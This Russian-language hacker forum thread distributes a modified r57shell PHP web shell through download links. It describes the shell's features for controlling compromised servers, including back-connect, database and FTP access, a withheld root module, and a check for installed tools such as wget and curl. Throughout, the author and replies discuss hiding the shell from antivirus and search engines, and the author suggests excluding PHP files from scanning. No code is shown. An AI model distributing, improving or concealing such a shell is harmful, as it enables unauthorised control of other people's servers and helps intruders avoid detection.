Выкладываю свой шелл. Точнее мною переделанный шелл r57shell. http://kobeluga.narod.ru/rst.txt Что я добавил в шелл: 1)Конфиг(в левом верхнем углу): т.е. Теперь все ненужные фичи шелла можно отключать(причом отключаеться не средствами JS, где просто скрываеться, а в самом php коде, т.е. лишний килобайты к вам не грузяться) =))))) В конфиге есть еще текстовое поле CMD: это сделано для тех случаев, когда в папке где загружен шелл допустим 1000 файлов, а стандартная команда всех шеллов ls -lia. И они просто напросто повиснут в этом случае. Если такая ситуация у вас, просто жмем СТОП и прописываем нужную вам конмаду, и шелл запуститься с нею. FTP: работа с ФТП E-Mail: работа с email (отсылка писем и т.д.) Mysql: работа с базами данных (Mysql,Mssql,Postgreql,Oracle) PHP: выполнение php кодов Text: поиск текста в файлах Proxy: в публичной версии этого модуля нету Seti: back конект и т.д. Root: в публичной версии этого модуля нету Единственное что при изменении конфига нажмите F5 если у вас кешируеться страницы. 2) создание файла/каталога с заданными правами 3) Изменение атрибутов файла/каталога (права, дата создания). 4) Показываеться твой IP и IP сервера, чтобы смотреть работает прокси или нет, или когда ставишь прокси не пинговать сервак чтобы узнать его Айпи. 5) Показываеться на сервере установленные утилиты из списка wget,get,fetch,curl,lynx,links,tar,gcc,perl,php,make Планирую спрятать его от антивиря и чтобы его поисковики не определяли ,и убрать кеширование. Вообщем тестируем, все глюки ,баги а также предложения и т.д. говорим мне, мне будет рассмотрено.
>>Амерский язык бы еще удалил. Он там не нужен я тоже думал над этим, но вдруг где нить не будет русского языка, тогда что?
Можно. Удали из него те вещи которые тебе не пригодятся, но думаю что большого эффекта ты не получишь
k1b0rg просто нема слов r57 и так был офигенный, а стал еще офигенней. РЕСПЕКТ ЗЫ: имхо буржуйский язык удалять не стоит... особенно тем кто оперу юзает)
Чет у меня никак не получается его скопировать - народный хостинг тормозит 2автор: запакуй его в архив, выложи на сайте если не влом
А вот у мя постоянно антивирус хрюкает когда видит этот шелл..... что можно сделать чтобы антивирус не распознавал шелл как вирус??
>>2автор: запакуй его в архив, выложи на сайте если не влом. а может лучше не надо запаковывать и так выложить? =))))) держи http://kiborg.comp-info.ru/rst.txt
есть, в антивирусе указать чтобы он не реагировал на *.php файлы (ну если тока у антивиря есть такая фича), а вообще я подумываю как сделать его не палящимся
Господа, в связи с тем, что у киборга у самого не осталось копии этого чудесного переделанного шелла, не мог бы кто выложить здесь рабочий скрипт?